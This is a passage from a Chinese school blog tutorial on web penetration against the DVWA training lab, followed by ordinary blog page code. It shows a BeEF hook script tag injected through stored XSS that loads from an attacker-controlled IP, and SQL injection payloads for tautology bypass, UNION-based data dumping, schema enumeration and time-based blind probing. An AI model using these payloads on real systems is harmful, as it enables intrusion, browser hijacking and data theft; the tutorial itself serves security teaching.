<li>布置钩子<br>接下来就可以重复之前的套路，把beef自动生成的勾子文件弄到靶机上<pre class="line-numbers language-html" data-language="html"><code class="language-html"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span> <span class="token attr-name">src</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>http://192.168.148.129:3000/hook.js<span class="token punctuation">"</span></span><span class="token punctuation">&gt;</span></span><span class="token script"></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">&gt;</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<em>在此之前，记得清空一下dvwa的数据库</em></li>
<li>收获牛肉<br>打开beef，发现已经有人中招了，现在就可以随便玩了，beef提供了非常多好玩的功能，比如页面弹框，强制跳转，修改页面链接，播放音频，启动摄像头，浏览器窗口拍照，钓鱼等等。太多了，篇幅有限，不详细讲了，请自行摸索吧<h2 id="五、特别声明"><a href="#五、特别声明" class="headerlink" title="五、特别声明"></a>五、特别声明</h2>本网站特意设计了xss跨站攻击漏洞，应该很容易就能找到，因为这种漏洞不会危害服务器，所以大家随便玩吧（一般是危害用户，比如盗别人的账号，利用钓鱼网站骗别人的钱等等）。<br>特别声明一点，本网站是用于海盐商贸学校计算机专业实战演练的漏洞靶机网站，只能用于学习网络安全相关知识，磨练技能，请记得我们是白帽子阵营，请勿违反<strong>《中华人民共和国网络安全法》</strong>，从事违法犯罪，否则后果自负</li>
</ol>
<h1 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h1><h2 id="一、测试是否有注入点"><a href="#一、测试是否有注入点" class="headerlink" title="一、测试是否有注入点"></a>一、测试是否有注入点</h2><p>先输入一个<code>'</code>(英文单引号)，如果报错You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’’’ at line 1，就证明能够接受单引号，存在SQL注入点。</p>
<h2 id="二、获得注入点当前数据表全部内容"><a href="#二、获得注入点当前数据表全部内容" class="headerlink" title="二、获得注入点当前数据表全部内容"></a>二、获得注入点当前数据表全部内容</h2><p>原始语句：<code>select first_name,last_name from dvwa.users where user_id=''</code></p>
<p>SQL注入语句：<code>' or 1=1 --'</code></p>
<p>注入后语句：<code>mysql -udvwa -pdvwa dvwa -e "select first_name,last_name from dvwa.users where user_id=' ' or 1=1 -- ' '"</code></p>
<h2 id="三、UNION联合查询"><a href="#三、UNION联合查询" class="headerlink" title="三、UNION联合查询"></a>三、UNION联合查询</h2><p>SQL注入语句：<code> 'union select user(), database() -- '</code></p>
<p>注入后语句： <code>select first_name,last_name from dvwa.users where user_id=''union select user(),database() -- ''</code></p>
<p><code>version() </code>获得数据库版本信息<br><code>database() </code>获得当前数据库名<br><code>user()</code> 获得当前用户名<br><em>注意：<code>union</code>后的字段必须和前面的一样，可以一个一个的猜。</em></p>
<h2 id="四、查询所有的库名及表名"><a href="#四、查询所有的库名及表名" class="headerlink" title="四、查询所有的库名及表名"></a>四、查询所有的库名及表名</h2><p><code>'union select TABLE_SCHEMA, table_name from INFORMATION_SCHEMA.tables -- '</code></p>
<h2 id="五、获得任意表任意字段数据"><a href="#五、获得任意表任意字段数据" class="headerlink" title="五、获得任意表任意字段数据"></a>五、获得任意表任意字段数据</h2><p><code>'union select 字段1, 字段2 from 数据表 -- '</code></p>
<p>因为<code>union</code>必须和前面的字段保持一致，如果想多查询几个字段，可以使用<code>concat</code>的方式如下，中间的空格用于将各个字段分隔开。</p>
<p><code>'union select 字段1, concat(字段2,' ',字段3,' ',字段4) from users -- '</code></p>
<h2 id="六、盲注点"><a href="#六、盲注点" class="headerlink" title="六、盲注点"></a>六、盲注点</h2><p>有些注入点是只接受用户输入，但是不显示出来，dvwa就提供了一个盲注点。</p>
<p>SQL注入语句：<code> ' and sleep(5) --</code></p>
<p>注入后语句：<code> select first_name,last_name from dvwa.users where user_id='1' and sleep(5) --</code></p>
<p>如果网页显示加载图标就证明这个是一个注入点。</p>
<video id="video" controls="" src="http://10.163.72.39:7777/123.mp4" preload="none"></video>
                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">彭韦浩</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://10.163.72.39:4000/2022/11/10/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8Web%E6%B8%97%E9%80%8F/">http://10.163.72.39:4000/2022/11/10/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8Web%E6%B8%97%E9%80%8F/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">彭韦浩</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/">
                                    <span class="chip bg-color">网络安全</span>
                                </a>
                            
                                <a href="/tags/Web%E5%AE%89%E5%85%A8/">
                                    <span class="chip bg-color">Web安全</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2022/11/11/%E5%B0%8F%E6%B8%B8%E6%88%8F%E5%BC%80%E5%8F%91%E5%85%A5%E9%97%A8/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/2.jpg" class="responsive-img" alt="小游戏开发入门">
                        
                        <span class="card-title">小游戏开发入门</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            选修课的笔记，详细到每一个操作步骤，还不学的我就没有任何办法了
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2022-11-11
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E7%AC%94%E8%AE%B0/" class="post-category">
                                    笔记
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E5%B0%8F%E6%B8%B8%E6%88%8F%E5%BC%80%E5%8F%91%E5%85%A5%E9%97%A8/">
                        <span class="chip bg-color">小游戏开发入门</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2022/10/29/Python%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB%E5%9F%BA%E7%A1%80/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/20.jpg" class="responsive-img" alt="Python网络爬虫基础">
                        
                        <span class="card-title">Python网络爬虫基础</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            我的爬虫经验都整理制作成教学案例分享给大家，都是精心制作的
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2022-10-29
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/Python/" class="post-category">
                                    Python
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/Python/">
                        <span class="chip bg-color">Python</span>
                    </a>
                    
                    <a href="/tags/%E9%A1%B9%E7%9B%AE%E6%95%99%E5%AD%A6/">
                        <span class="chip bg-color">项目教学</span>
                    </a>
                    
                    <a href="/tags/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/">
                        <span class="chip bg-color">网络爬虫</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h1, h2, h3, h4'
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="/libs/aplayer/Meting.min.js"></script>

    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            <!-- Copyright&nbsp;&copy;
            
                <span id="year">2022-2023</span>
            
            <a href="/about" target="_blank">彭韦浩</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a> -->
            <br>
            
                &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                        class="white-color">33.7k</span>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
                <span id="icp"><img src="/medias/icp.png"
                                    style="vertical-align: text-bottom;"/>
                <a href="http://www.beian.miit.gov.cn/" target="_blank">琼ICP备2021004272号</a>
            </span>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">


    <a href="mailto:532753310@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=532753310" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 532753310" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    

    <!-- 雪花特效 -->
     
        <script type="text/javascript">
            // 只在桌面版网页启用特效
            var windowWidth = $(window).width();
            if (windowWidth > 768) {
                document.write('<script type="text/javascript" src="/libs/others/snow.js"><\/script>');
            }
        </script>
    

    <!-- 鼠标星星特效 -->
     
        <script type="text/javascript">
            // 只在桌面版网页启用特效
            var windowWidth = $(window).width();
            if (windowWidth > 768) {
                document.write('<script type="text/javascript" src="/libs/others/star.js"><\/script>');
            }
        </script>
    

     
        <script src="https://ssl.captcha.qq.com/TCaptcha.js"></script>
        <script src="/libs/others/TencentCaptcha.js"></script>
        <button id="TencentCaptcha" data-appid="xxxxxxxxxx" data-cbfn="callback" type="button" hidden></button>
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    
    
    <script type="text/javascript" size="150" alpha='0.6'
        zIndex="-1" src="/libs/background/ribbon.min.js" async="async"></script>
    

    
    <script type="text/javascript" src="/libs/background/ribbon-dynamic.js" async="async"></script>
    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginModelPath":"assets/","model":{"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"position":"left","width":150,"height":300},"mobile":{"show":false},"log":false,"pluginJsPath":"lib/","pluginRootPath":"live2dw/","tagMode":false});</script></body>

</html>

<!-- 鼠标点击烟花效果 -->
<canvas class="fireworks" style="position: fixed;left: 0;top: 0;z-index: 1; pointer-events: none;" ></canvas> 
<script type="text/javascript" src="//cdn.bootcss.com/animejs/2.2.0/anime.min.js"></script> 
<script type="text/javascript" src="/js/djtx.js"></script>
